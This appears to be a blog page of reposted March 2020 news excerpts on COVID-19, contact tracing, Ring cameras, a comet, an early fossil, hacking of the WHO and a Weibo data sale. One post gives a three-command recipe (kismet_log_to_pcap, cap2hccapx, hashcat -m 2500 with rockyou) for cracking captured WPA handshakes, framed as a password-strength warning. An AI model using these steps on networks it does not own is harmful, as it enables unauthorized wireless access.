Source: Want to see through walls? Electroboffins build tiny chip in the lab that vibrates at just the right frequency to do it • The Register

LA Teen Who Died of Covid-19 Was Denied Treatment Because He Didn’t Have Health Insurance. The US looks like a banana republic.

Posted on by

A 17-year-old boy in Los Angeles County who became the first teen believed to have died from complications with covid-19 in the U.S. was denied treatment at an urgent care clinic because he didn’t have health insurance, according to R. Rex Parris, the mayor of Lancaster, California. Roughly 27.5 million Americans—8.5 percent of the population—don’t have health insurance based on the latest government figures.

“He didn’t have insurance, so they did not treat him,” Parris said in a video posted to YouTube. The staff at the urgent care facility told the teen to try the emergency room at Antelope Valley (AV) Hospital, a public hospital in the area, according to the mayor.

“En route to AV Hospital, he went into cardiac arrest, when he got to AV hospital they were able to revive him and keep him alive for about six hours,” Parris said. “But by the time he got there, it was too late.”

The name of the urgent care clinic that refused to treat the teen has not been released. Mayor Parris explained in his YouTube video that the 17-year-old is believed to have had no underlying conditions that may have contributed to his death.

“He had been sick for a few days, he had no previous health conditions. On the Friday before he died, he was healthy, he was socializing with his friends,” the mayor explained.

Source: Teen Who Died of Covid-19 Was Denied Treatment Because He Didn’t Have Health Insurance

Singapore Government to make its contact-tracing app freely available to developers worldwide

Posted on by

SINGAPORE – In a move to help the international community combat the coronavirus pandemic, the Government will be making the software for its contact-tracing application TraceTogether, which has already been installed by more than 620,000 people, freely available to developers around the world.

In a Facebook post on Monday (March 23), Minister-in-charge of the Smart Nation Initiative Vivian Balakrishnan said that the app, developed by the Government Technology Agency (GovTech) and the Ministry of Health, will be open-sourced.

This means that the software’s source code will be made freely available and may be redistributed and modified.

“We believe that making our code available to the world will enhance trust and collaboration in dealing with a global threat that does not respect boundaries, political systems or economies,” said Dr Balakrishnan, who is also Foreign Minister.

“Together, we can make our world safer for everyone.”

Launched last Friday, the TraceTogether app can identify people who have been within 2m of coronavirus patients for at least 30 minutes, using wireless Bluetooth technology. Its developers say the app is useful when those infected cannot recall whom they had been in close proximity with for an extended duration.

For the app to start tracing, the Bluetooth setting on mobile phones has to be turned on.

If a user gets infected, the authorities will be able to quickly find out the other users he has been in close contact with, allowing for easier identification of potential cases and helping curb the spread of the virus.

Official contact tracers will provide a code that users can match with a corresponding verification code on their app. Once authenticated, users will get a PIN that allows data to be submitted.

Contact tracers will not ask for any personal financial details or request that money be transferred over the phone.

In his post on Monday, Dr Balakrishnan said that the GovTech team was working “around the clock” to finalise documents to allow others to use the BlueTrace protocol – the building blocks of the TraceTogether app. He added that TraceTogether has been installed by more than 620,000 users so far.

Dr Janil Puthucheary, Minister-in-charge of GovTech, also weighed in on the app in a radio show on Monday, saying that a team of about 40 engineers spent more than 10,000 man-hours developing TraceTogether.

Dr Janil also encouraged more people to download TraceTogether as added protection.

TraceTogether’s developers uploaded a manifesto for BlueTrace on the app’s website on Monday, calling for international adoption of contact-tracing solutions in today’s globalised world as weapons to turn the tide against the Covid-19 outbreak.

“Covid-19 and other novel viruses do not respect national boundaries. Neither should humanity’s response. In a globalised world, with high volumes of international travel, any decentralised contact-tracing solution will need mass adoption to maximise network effects,” stated the app developers’ manifesto.

Help fight the spread of COVID-19 with TraceTogether!

Interested parties can contact the TraceTogether team via e-mail or check this website for more information.

Source: Coronavirus: S’pore Government to make its contact-tracing app freely available to developers worldwide, Singapore News & Top Stories – The Straits Times

WPA Cracking from Kismet sensors

Posted on by

During a recent event I decided to setup a passive monitoring station to check for any attempts to impersonate, hi-jack, or deny service to our WiFi . For this task I decided to use an Alpha card, and Kismet (which comes already installed on Kali linux). To deploy for wireless intrusion detection (WIDS)

Kismet worked as advertised and I was able to monitor channel utilization and for wireless anomalies (think pwnagotchi or hak5 pineapple)

Channel Utilization Monitoring

Kismet WIDS alerting

This worked great, but I soon noticed that Kismet also was logging WPA handshakes for client connections. Which made me wonder, could kismet be used as an attack platform?

Captured WPA key exchange

After some quick googling I found indeed its very possible using this 3 step process.

  1. Export PCAP data out of the kismet session database (by default stored at the root of a user home dir) by issuing the command kismet_log_to_pcap — in foo.kismet — out foo.pcap
  2. Convert that PCAP into something consumable by hashcat by issuing the command cap2hccapx.bin foo.pcap foo.hccapx
  3. Setup hashcat to crack the stored key exchanges by using the command hashcat64.exe -m 2500 foo.hccapx rockyou.txt -r rules/rockyou-30000.rule

What was surprising was that it took seconds or less to crack many of the captured sessions. Whats more interesting is that its possible to deploy kismet on extremely cheap hardware such as a Raspberry Pi and form fleets of sensors that all log to a central point, and that are all cracked and monitored.

hashcat output

Today’s key take away? If you use a portable access point such as your phone as a hotspot you still need to use an extremely long and complex password. It used to take an exorbitant amount of time to crack WPA2 but that is no longer true. Modern techniques for cracking the pairwise master key have been developed which combined with GPU based password cracking means weak passwords can often be instantly cracked.

To read more about this check out Ins1gn1a’s article titled Understanding WPA/WPA2 Pre-Shared-Key Cracking

Source: WPA Cracking from Kismet sensors – William Reyor – Medium

Ring corporate surveillance doorbells Continues To Insist Its Cameras Reduce Crime, But Crime Data Doesn’t Back Those Claims Up

Posted on by

Despite evidence to the contrary, Amazon’s Ring is still insisting its the best thing people can put on their front doors — an IoT camera with PD hookups that will magically reduce crime in their neighborhoods simply by being a mute witness of criminal acts.

Boasting over 1,000 law enforcement partnerships, Ring talks a good game about crime reduction, but its products haven’t proven to be any better than those offered by competitors — cameras that don’t come with law enforcement strings attached.

Last month, Cyrus Farivar undid a bit of Ring’s PR song-and-dance by using public records requests and conversations with law enforcement agencies to show any claim Ring makes about crime reduction probably (and in some cases definitely) can’t be linked to the presence of Ring’s doorbell cameras.

CNET has done the same thing and come to the same conclusion: the deployment of Ring cameras rarely results in any notable change in property crime rates. That runs contrary to the talking points deployed by Dave Limp — Amazon’s hardware chief — who “believes” adding Rings to neighborhoods makes neighborhoods safer. Limp needs to keep hedging.

CNET obtained property-crime statistics from three of Ring’s earliest police partners, examining the monthly theft rates from the 12 months before those partners signed up to work with the company, and the 12 months after the relationships began, and found minimal impact from the technology.

The data shows that crime continued to fluctuate, and analysts said that while many factors affect crime rates, such as demographics, median income and weather, Ring’s technology likely wasn’t one of them.

Worse for Ring — which has used its partnerships with law enforcement agencies to corner the market for doorbell cameras — law enforcement agencies are saying the same thing: Ring isn’t having any measurable impact on crime.

“In 2019, we saw a 6% decrease in property crime,” said Kevin Warych, police patrol commander in Green Bay, Wisconsin, but he noted, “there’s no causation with the Ring partnership.”

[…]

“I can’t put numbers on it specifically, if it works or if it doesn’t reduce crime,” [Aurora PD public information officer Paris] Lewbel said.

But maybe it doesn’t really matter to Ring if law enforcement agencies believe the crime reduction sales pitch. What ultimately matters is that end users might. After all, these cameras are installed on homes, not police departments. As long as potential customers believe crime in their area (or at least their front doorstep) will be reduced by the presence of camera, Ring can continue to increase market share.

But the spin is, at best, inaccurate. Crime rates in cities where Ring has partnered with law enforcement agencies continue to fluctuate. Meanwhile, Ring has fortuitously begun its mass deployment during a time of historically-low crime rates which have dropped steadily for more than 20 years. Hitting the market when things are good and keep getting better makes for pretty good PR, especially when company reps are willing to convert correlation to causation to sell devices.

Source: Ring Continues To Insist Its Cameras Reduce Crime, But Crime Data Doesn’t Back Those Claims Up | Techdirt

Comet ATLAS is Brightening Faster than Expected might be awesome to look at mid May

Posted on by

Comet ATLAS (C2019 Y4) is plunging toward the sun, and if it doesn’t fly apart it could soon become one of the brightest comets in years.

“Comet ATLAS continues to brighten much faster than expected,” says Karl Battams of the Naval Research Lab in Washington DC. “Some predictions for its peak brightness now border on the absurd.”

atlas3_crop

Above: Comet ATLAS (C/2019 Y4) photographed on March 6, 2020, by Austrian astrophotographer Michael Jäger. The comet’s diffuse green atmosphere is about twice as wide as the planet Jupiter.

The comet was discovered in December 2019 by the Asteroid Terrestrial-impact Last Alert System (ATLAS) in Hawaii. Astronomers quickly realized it might be special. On May 31, 2020, Comet ATLAS will pass deep inside the orbit of Mercury only 0.25 AU from the sun. If it can survive the blast furnace of solar heating, it could put on a good show.

However, no one expected the show to start this soon. More than 2 months before perihelion (closest approach to the sun), Comet ATLAS is already “heating up.” The worldwide Comet Observation Database shows it jumping from magnitude +17 in early February to +8 in mid-March–a 4000-fold increase in brightness. It could become visible to the naked eye in early April.

“Right now the comet is releasing huge amounts of its frozen volatiles (gases),” says Battams. “That’s why it’s brightening so fast.”

lightcurve

Can ATLAS sustain this crazy pace? If it has a big nucleus with large stores of frozen gas, then yes; we could get a very bright comet. Otherwise, Comet ATLAS might “run out of gas”, crumbling and fading as it approaches the sun.

Current best estimates of the comet’s peak brightness in May range from magnitude +1 to -5. If Comet ATLAS hits the high end of that range, a bit brighter than Venus, it could become visible in broad daylight.

Source: Comet ATLAS is Brightening Faster than Expected | Spaceweather.com

Ancestor of all animals identified in Australian fossils

Posted on by

A team led by UC Riverside geologists has discovered the first ancestor on the family tree that contains most familiar animals today, including humans.

The tiny, wormlike creature, named Ikaria wariootia, is the earliest bilaterian, or organism with a front and back, two symmetrical sides, and openings at either end connected by a gut. The paper is published today in Proceedings of the National Academy of Sciences.

The earliest multicellular organisms, such as sponges and algal mats, had variable shapes. Collectively known as the Ediacaran Biota, this group contains the oldest fossils of complex, multicellular organisms. However, most of these are not directly related to animals around today, including lily pad-shaped creatures known as Dickinsonia that lack basic features of most animals, such as a mouth or gut.

The development of bilateral symmetry was a critical step in the evolution of animal life, giving organisms the ability to move purposefully and a common, yet successful way to organize their bodies. A multitude of animals, from worms to insects to dinosaurs to humans, are organized around this same basic bilaterian body plan.

Evolutionary biologists studying the genetics of modern animals predicted the oldest ancestor of all bilaterians would have been simple and small, with rudimentary sensory organs. Preserving and identifying the fossilized remains of such an animal was thought to be difficult, if not impossible.

A 3D laser scan that showing the regular, consistent shape of a cylindrical body with a distinct head and tail and faintly grooved musculature. Credit: Droser Lab/UCR

For 15 years, scientists agreed that fossilized burrows found in 555 million-year-old Ediacaran Period deposits in Nilpena, South Australia, were made by bilaterians. But there was no sign of the creature that made the burrows, leaving scientists with nothing but speculation.

Scott Evans, a recent doctoral graduate from UC Riverside; and Mary Droser, a professor of geology, noticed miniscule, oval impressions near some of these burrows. With funding from a NASA exobiology grant, they used a three-dimensional laser scanner that revealed the regular, consistent shape of a cylindrical body with a distinct head and tail and faintly grooved musculature. The animal ranged between 2-7 millimeters long and about 1-2.5 millimeters wide, with the largest the size and shape of a grain of rice—just the right size to have made the burrows.

“We thought these should have existed during this interval, but always understood they would be difficult to recognize,” Evans said. “Once we had the 3-D scans, we knew that we had made an important discovery.”

The researchers, who include Ian Hughes of UC San Diego and James Gehling of the South Australia Museum, describe Ikaria wariootia, named to acknowledge the original custodians of the land. The genus name comes from Ikara, which means “meeting place” in the Adnyamathanha language. It’s the Adnyamathanha name for a grouping of mountains known in English as Wilpena Pound. The species name comes from Warioota Creek, which runs from the Flinders Ranges to Nilpena Station.

Ikaria wariootia impressions in stone. Credit: Droser Lab/UCR

“Burrows of Ikaria occur lower than anything else. It’s the oldest fossil we get with this type of complexity,” Droser said. “Dickinsonia and other big things were probably evolutionary dead ends. We knew that we also had lots of little things and thought these might have been the early bilaterians that we were looking for.”

In spite of its relatively simple shape, Ikaria was complex compared to other fossils from this period. It burrowed in thin layers of well-oxygenated sand on the ocean floor in search of organic matter, indicating rudimentary sensory abilities. The depth and curvature of Ikaria represent clearly distinct front and rear ends, supporting the directed movement found in the burrows.

The burrows also preserve crosswise, “V”-shaped ridges, suggesting Ikaria moved by contracting muscles across its body like a worm, known as peristaltic locomotion. Evidence of sediment displacement in the burrows and signs the organism fed on buried organic matter reveal Ikaria probably had a mouth, anus, and gut.

“This is what evolutionary biologists predicted,” Droser said. “It’s really exciting that what we have found lines up so neatly with their prediction.”

Source: Ancestor of all animals identified in Australian fossils

Hackers target WHO as cyberattacks double

Posted on by

WHO Chief Information Security Officer Flavio Aggio said the identity of the hackers was unclear and the effort was unsuccessful. But he warned that hacking attempts against the agency and its partners have soared as they battle to contain the coronavirus, which has killed more than 15,000 worldwide.

The attempted break-in at the WHO was first flagged to Reuters by Alexander Urbelis, a cybersecurity expert and attorney with the New York-based Blackstone Law Group, which tracks suspicious internet domain registration activity.

Urbelis said he picked up on the activity around March 13, when a group of hackers he’d been following activated a malicious site mimicking the WHO’s internal email system.

“I realized quite quickly that this was a live attack on the World Health Organization in the midst of a pandemic,” he said.

Urbelis said he didn’t know who was responsible, but two other sources briefed on the matter said they suspected an advanced group of hackers known as DarkHotel, which has been conducting cyber-espionage operations since at least 2007.

Messages sent to email addresses maintained by the hackers went unreturned.

When asked by Reuters about the incident, the WHO’s Aggio confirmed that the site spotted by Urbelis had been used in an attempt to steal passwords from multiple agency staffers.

“There has been a big increase in targeting of the WHO and other cybersecurity incidents,” Aggio said in a telephone interview. “There are no hard numbers, but such compromise attempts against us and the use of (WHO) impersonations to target others have more than doubled.”

The WHO published an alert last month – available here here – warning that hackers are posing as the agency to steal money and sensitive information from the public.

And government officials in the United States, Britain and elsewhere have issued cybersecurity warnings about the dangers of a newly remote workforce as people disperse to their homes to work and study because of the coronavirus pandemic.

The motives in the case identified by Reuters aren’t clear. United Nations agencies, the WHO among them, are regularly targeted by digital espionage campaigns and Aggio said he did not know who precisely at the organization the hackers had in their sights.

Cybersecurity firms including Romania’s Bitdefender and Moscow-based Kaspersky said they have traced many of DarkHotel’s operations to East Asia – an area that has been particularly affected by the coronavirus. Specific targets have included government employees and business executives in places such as China, North Korea, Japan, and the United States.

Source: Exclusive: Elite hackers target WHO as coronavirus cyberattacks spike – Reuters

New York Stock Exchange Chairman Sold Millions in Stock Before Crash and after wife had been briefed about Covid-19 secretly

Posted on by

Jeffrey Sprecher, the chairman of the New York Stock Exchange, sold $3.5 million in stock on February 26, a month after his wife, Senator Kelly Loeffler of Georgia, received a closed-door briefing about the covid-19 threat. According to SEC filings, Sprecher sold $15.3 million more in stock on March 11, at the beginning of the crash that has seen trillions of dollars wiped from the financial markets. Both stock sales were of Intercontinental Exchange (known as ICE), the company that owns the NYSE, and of which Sprecher just happens to be CEO.

The revelations about Sprecher come from a new report by CBS News, which examined filings with the Securities and Exchange Commission (SEC). Loeffler’s own stock sales recently made headlines after it was revealed that she sold millions in stock the same day she received a closed-door January 26 briefing on the potential impact of the covid-19 pandemic. Loeffler denies having any knowledge of the sales done in her name.

What makes Sprecher’s stock sales a scandal? For one, they should have been reported as part of Loeffler’s financial disclosures, but were not. Senators have been required to give periodic financial disclosures since 2012 and those filings include any sales and purchases made by the politician’s spouse.

[…]

his wife had secret information about a global pandemic and both of them unloaded while she kept publicly saying everything was fine and dandy.

In fact, this was the video Loeffler posted to Twitter on March 10, the day before her husband unloaded $15.3 million worth of stock in his own company.

Sprecher and Loeffler are reportedly worth at least $500 million. Capitalism may be on its last legs during the covid-19 pandemic, but you can bet that millionaires and billionaires will do everything they can to keep it afloat. Even if a few million people have to die.

Source: New York Stock Exchange Chairman Sold Millions in Stock Before Crash

Hacker selling data of 538 million Weibo users

Posted on by

The personal details of more than 538 million users of Chinese social network Weibo are currently available for sale online, according to ads seen by ZDNet and corroborating reports from Chinese media.

In ads posted on the dark web and other places, a hacker claims to have breached Weibo in mid-2019 and obtained a dump of the company’s user database.

The database allegedly contains the details for 538 million Weibo users. Personal details include the likes of real names, site usernames, gender, location, and — for 172 million users — phone numbers.

Passwords were not included, which explains why the hacker is selling the Weibo data for only ¥1,799 ($250).

Source: Hacker selling data of 538 million Weibo users | ZDNet